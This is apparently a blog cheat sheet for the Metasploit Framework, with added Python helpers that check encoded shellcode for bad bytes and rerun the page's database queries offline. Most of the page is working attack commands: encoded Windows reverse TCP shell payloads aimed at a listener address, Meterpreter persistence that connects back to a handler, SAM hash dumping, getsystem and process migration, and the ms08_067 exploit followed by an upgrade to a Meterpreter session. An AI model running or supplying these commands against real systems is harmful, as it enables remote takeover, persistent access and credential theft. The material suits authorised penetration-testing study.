admin  2019-02-18 00:11  lsh4ck's Blog

Metasploit Framework - Payload Encoding

List all available payloads and search for Windows reverse TCP shells
msfpayload -l | grep windows | grep shell | grep reverse | grep tcp
List available encoders 
msfencode -l 
Reverse self-contained (not staged) command shell: 341 bytes
msfpayload windows/shell_reverse_tcp LHOST=192.168.6.1 R | msfencode -e x86/shikata_ga_nai -b '\x00\x0a\x0b\x0d\x90' -t c

Windows Command Shell, Reverse Ordinal TCP Stager (No NX or Win7)

Use msf multi/handler to listen for the connect-back and deliver the remainder of the shellcode (stage 2)

msfpayload windows/shell/reverse_ord_tcp LHOST=192.168.6.1 R | msfencode -e x86/shikata_ga_nai -b '\x00\x0a\x0b\x0d\x90' -t c

Generic Syntax

msfpayload <payload> <options> <output> | msfencode -e <encoder> -b <bad bytes> -t <output format>

Note: msfpayload and msfencode were removed from the framework in 2015. msfvenom performs both steps in one command with the same ideas behind the flags: msfvenom -p <payload> <options> -e <encoder> -b '<bad bytes>' -f <output format>. With shikata_ga_nai the output is polymorphic, so each run produces different bytes and the bad-byte check should be repeated on the blob you actually ship.
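The encoder is asked to avoid the bytes given with -b, but nothing on the page verifies that the emitted blob actually does so. The script below is an added example (not part of the original cheat sheet or of Metasploit): it parses the C array that msfencode -t c (or msfvenom -f c) prints, parses the -b argument the same way, and reports the offset of every forbidden byte. The C array in SAMPLE_C_OUTPUT is constructed for the demonstration, not real encoder output, and deliberately ends in \x0d\x90 so the check has something to find.

```python
"""Verify that encoded shellcode really avoids the bad bytes passed with -b.

Parses the C array printed by msfencode -t c / msfvenom -f c (added example,
not Metasploit code)."""
import re
import sys


def parse_hex_escapes(text: str) -> bytes:
    """Collect every \\xNN escape in a C array literal (or in a -b argument) into bytes."""
    return bytes(int(h, 16) for h in re.findall(r'\\x([0-9a-fA-F]{2})', text))


# Bad bytes from the msfencode command lines above: -b '\x00\x0a\x0b\x0d\x90'
BAD_BYTES = parse_hex_escapes(r'\x00\x0a\x0b\x0d\x90')

# Constructed sample in the shape msfencode -t c prints. NOT real encoder output;
# the second line intentionally contains \x0d\x90 so the checker reports hits.
SAMPLE_C_OUTPUT = r'''
unsigned char buf[] =
"\xda\xc1\xd9\x74\x24\xf4\x5f\x33\xc9\xb1\x52\xbf\x11\x22\x33\x44"
"\x31\x7f\x17\x83\xc7\x04\x03\x7f\x13\x0d\x90\x41";
'''


def find_bad_bytes(shellcode: bytes, bad: bytes) -> list:
    """Return (offset, value) for every forbidden byte; an empty list means clean."""
    return [(i, b) for i, b in enumerate(shellcode) if b in bad]


def check_c_output(text: str, bad: bytes = BAD_BYTES) -> dict:
    """Parse a C array dump and summarise length, bad-byte hits and a clean flag."""
    shellcode = parse_hex_escapes(text)
    hits = find_bad_bytes(shellcode, bad)
    return {"length": len(shellcode), "hits": hits, "clean": not hits}


if __name__ == "__main__":
    # Usage: python check_badchars.py encoded.c   (falls back to the built-in sample)
    source = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_C_OUTPUT
    result = check_c_output(source)
    if result["clean"]:
        print(f"{result['length']} bytes, no bad bytes")
    else:
        where = ", ".join(f"offset {o}: 0x{v:02x}" for o, v in result["hits"])
        print(f"{result['length']} bytes, BAD BYTES found: {where}")
    sys.exit(0 if result["clean"] else 1)
```

Pipe the msfencode/msfvenom output into a file and run the script on it; a non-zero exit makes it easy to use in a loop that re-encodes until a clean blob comes out.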

Importing external scan results into the database

Importing Nmap scans into the MSF database
msf> db_import /path/filename.xml
(scanning externally with nmap -oX and importing the XML is often faster than running nmap from inside msf, see db_nmap below)

Importing Nessus scans into the MSF database
msf> db_import /path/filename.nessus

Importing NeXpose scans into the MSF database

msf> db_import /path/filename.xml

Running an Nmap scan within MSF to add to the database

msf> db_nmap -sS -A <hosts>
or
msf> db_nmap -sSV -O -PN --send-ip <hosts>
Running NeXpose from within MSF
msf> load nexpose
msf> nexpose_connect username:password@host[:port]
msf> nexpose_scan

Running Nessus from within MSF

msf> load nessus
msf> nessus_connect username:password@host[:port]
msf> nessus_policy_list
msf> nessus_scan_new
msf> nessus_scan_status
msf> nessus_report_list
msf> nessus_report_get

Retrieving data from the database from within MSF

List of discovered services
msf> db_services

List of discovered hosts
msf> db_hosts

List of discovered hosts, showing only the address and os_flavor columns (-c selects the columns to display)
msf> db_hosts -c address,os_flavor

List of discovered vulnerabilities (e.g. as imported from a vulnerability scanner such as Nessus)
msf> db_vulns

(In current Metasploit releases db_hosts, db_services and db_vulns have been renamed hosts, services and vulns; -c still selects the columns.)

Retrieving data from the database from within MySQL

Retrieve hosts and associated services:
mysql> select address,hosts.name,os_name,os_flavor,os_sp,hosts.updated_at,port,proto,services.name,services.info from hosts,services where hosts.id=services.host_id;
Retrieve hosts matching 'pc21-97.*' and their associated services:
mysql> select address,hosts.name,os_name,os_flavor,os_sp,hosts.updated_at,port,proto,services.name,services.info from hosts,services where hosts.name LIKE 'pc21-97.%' and hosts.id=services.host_id;
Retrieve hosts matching '*.97' and their associated services:
mysql> select address,hosts.name,os_name,os_flavor,os_sp,hosts.updated_at,port,proto,services.name,services.info from hosts,services where hosts.address LIKE '%.97' and hosts.id=services.host_id;
(Current Metasploit releases use PostgreSQL rather than MySQL as the database backend; the same queries work unchanged from psql.)
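To try the hosts/services queries without a live Metasploit database, the following added example (not from the page or from Metasploit) rebuilds just the columns the queries reference in an in-memory SQLite database, loads a few constructed rows that echo the scanner output shown on this page, and runs the implicit join above as an explicit JOIN with the two LIKE filters bound as parameters. The table layout is a stand-in for the real schema, which has many more columns, and every host and service row is made up.

```python
"""Offline stand-in for the hosts/services queries in the cheat sheet.

Added example: sqlite3 instead of the real Metasploit database, and only the
columns the page's queries use."""
import sqlite3

# Subset of the Metasploit hosts/services tables (assumed layout, page columns only).
SCHEMA = """
CREATE TABLE hosts (
    id INTEGER PRIMARY KEY, address TEXT, name TEXT, os_name TEXT,
    os_flavor TEXT, os_sp TEXT, updated_at TEXT);
CREATE TABLE services (
    id INTEGER PRIMARY KEY, host_id INTEGER NOT NULL REFERENCES hosts(id),
    port INTEGER, proto TEXT, name TEXT, info TEXT);
"""

# Constructed rows. The third hostname is a deliberate near-miss for 'pc21-97.%'.
HOSTS = [
    (1, "192.168.1.22",  "pc21-97.example.lab",  "Linux",   "Ubuntu", "",    "2019-02-18 00:11:00"),
    (2, "192.168.1.143", "V-XPSP2-BARE",         "Windows", "XP",     "SP2", "2019-02-18 00:12:00"),
    (3, "192.168.1.97",  "pc21-97b.example.lab", "Windows", "2003",   "SP2", "2019-02-18 00:13:00"),
]
SERVICES = [
    (1, 1, 22,   "tcp", "ssh",   "SSH-2.0-OpenSSH_5.1p1 Debian-3ubuntu1"),
    (2, 2, 1433, "tcp", "mssql", "Version 10.0.1600.22 InstanceName=SQLEXPRESS"),
    (3, 2, 445,  "tcp", "smb",   "Windows XP Service Pack 2"),
    (4, 3, 445,  "tcp", "smb",   "Windows 2003 Service Pack 2"),
]

# The page's "from hosts,services where hosts.id=services.host_id" as an explicit
# JOIN; either LIKE filter is skipped when its parameter is NULL.
HOST_SERVICES_SQL = """
SELECT h.address, h.name, h.os_name, h.os_flavor, h.os_sp, h.updated_at,
       s.port, s.proto, s.name, s.info
FROM hosts AS h
JOIN services AS s ON s.host_id = h.id
WHERE (:name_like IS NULL OR h.name LIKE :name_like)
  AND (:addr_like IS NULL OR h.address LIKE :addr_like)
ORDER BY h.address, s.port
"""


def build_db() -> sqlite3.Connection:
    """Create the in-memory database and load the constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    conn.executemany("INSERT INTO hosts VALUES (?,?,?,?,?,?,?)", HOSTS)
    conn.executemany("INSERT INTO services VALUES (?,?,?,?,?,?)", SERVICES)
    conn.commit()
    return conn


def host_services(conn: sqlite3.Connection, name_like=None, addr_like=None) -> list:
    """Return (address, hostname, port, proto, service) for every matching host/service pair.

    The patterns are bound as parameters, so a hostname scraped from a scan such as
    "x' OR 1=1--" is matched literally instead of rewriting the query."""
    rows = conn.execute(HOST_SERVICES_SQL, {"name_like": name_like, "addr_like": addr_like})
    return [(r[0], r[1], r[6], r[7], r[8]) for r in rows.fetchall()]


if __name__ == "__main__":
    db = build_db()
    for label, kwargs in (("all hosts", {}),
                          ("name LIKE 'pc21-97.%'", {"name_like": "pc21-97.%"}),
                          ("address LIKE '%.97'", {"addr_like": "%.97"})):
        print(label)
        for row in host_services(db, **kwargs):
            print("  ", row)
```

The same SELECT, minus the parameter placeholders, is what the mysql/psql one-liners above run; keeping the filters as bound parameters matters once hostnames and banners from untrusted targets start flowing into your reporting scripts.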

Service Scanners - SSH Server Banner Scanner

msf > use auxiliary/scanner/ssh/ssh_version
msf auxiliary(ssh_version) > set RHOSTS 192.168.1.0/24
msf auxiliary(ssh_version) > set THREADS 20
msf auxiliary(ssh_version) > run
[*] 192.168.1.22 :22, SSH server version: SSH-2.0-OpenSSH_5.1p1 Debian-3ubuntu1

Service Scanners - MSSQL Scanner

msf > use auxiliary/scanner/mssql/mssql_ping
msf auxiliary(mssql_ping) > set RHOSTS 192.168.1.0/24
msf auxiliary(mssql_ping) > set THREADS 20
msf auxiliary(mssql_ping) > run
[*] 192.168.1.143 SQL Server information for :
[*] 192.168.1.143 ServerName = V-XPSP2-BARE
[*] 192.168.1.143 InstanceName = SQLEXPRESS
[*] 192.168.1.143 IsClustered = No
[*] 192.168.1.143 Version = 10.0.1600.22
[*] 192.168.1.143 tcp = 1433
Service Scanners - SMB Version Scanner

msf > use auxiliary/scanner/smb/smb_version
msf auxiliary(smb_version) > set RHOSTS <hosts>
msf auxiliary(smb_version) > run
[*] 192.168.1.143 is running Windows XP Service Pack 2 (language: English) (name:HOSTNAME) (domain:WORKGROUP)

Service Scanners -  SNMP login scanner

msf> use auxiliary/scanner/snmp/snmp_login

Meterpreter Scripts - Persistence

meterpreter > run persistence -X -i 50 -p 443 -r 192.168.1.1
start at boot (-X, which writes an HKLM Run key and therefore needs admin rights; -U uses the current user's HKCU key instead), retry interval in seconds (-i 50), port (-p 443) and the reverse-connect target (-r), i.e. the LHOST of the handler below. The script drops a VBS launcher on disk, so expect it to be visible to endpoint tooling.
msf> use multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(handler) > set LPORT 443
msf exploit(handler) > set LHOST  192.168.1.1
msf exploit(handler) > exploit
[*] Meterpreter session 2 opened (:443 -> :1120)

Metasploit Meterpreter Post Exploitation Modules

Hashdump - the 'hashdump' post module dumps the contents of the SAM database.
meterpreter > run post/windows/gather/hashdump
or
meterpreter > hashdump
Occasionally the current process does not have access or permission to retrieve the hashes, even if meterpreter is running as SYSTEM or an administrator.
Access can usually be regained by making sure the process holds every privilege it can (getprivs), by migrating into a process spawned by SYSTEM, or, on x64 systems, by making sure the running process is native 64-bit (e.g. the 64-bit notepad.exe) rather than a 32-bit WoW64 process.

List running processes and their owners (where visible to the current user)
meterpreter > ps
Get SYSTEM if necessary and if possible
meterpreter > getsystem
Enable all missing/available privileges for the current process
meterpreter > getprivs
Migrate to a new process (PID from ps) and try again

meterpreter > migrate <pid>


Meterpreter Scripts - System Scraper
meterpreter > run scraper

Upgrading command shell to meterpreter shell
msf > use windows/smb/ms08_067_netapi
... ... ...
[*] Command shell session 1 opened (:8080 -> :1032)
[*] Session 1 created in the background.
msf exploit(ms08_067_netapi) > sessions -u 1
... ... ...
[*] Meterpreter session 2 opened (:8080 -> :1044)
msf exploit(ms08_067_netapi) > sessions -i 2


This is an original article; copyright reserved. You are welcome to share it; please keep the source attribution when republishing.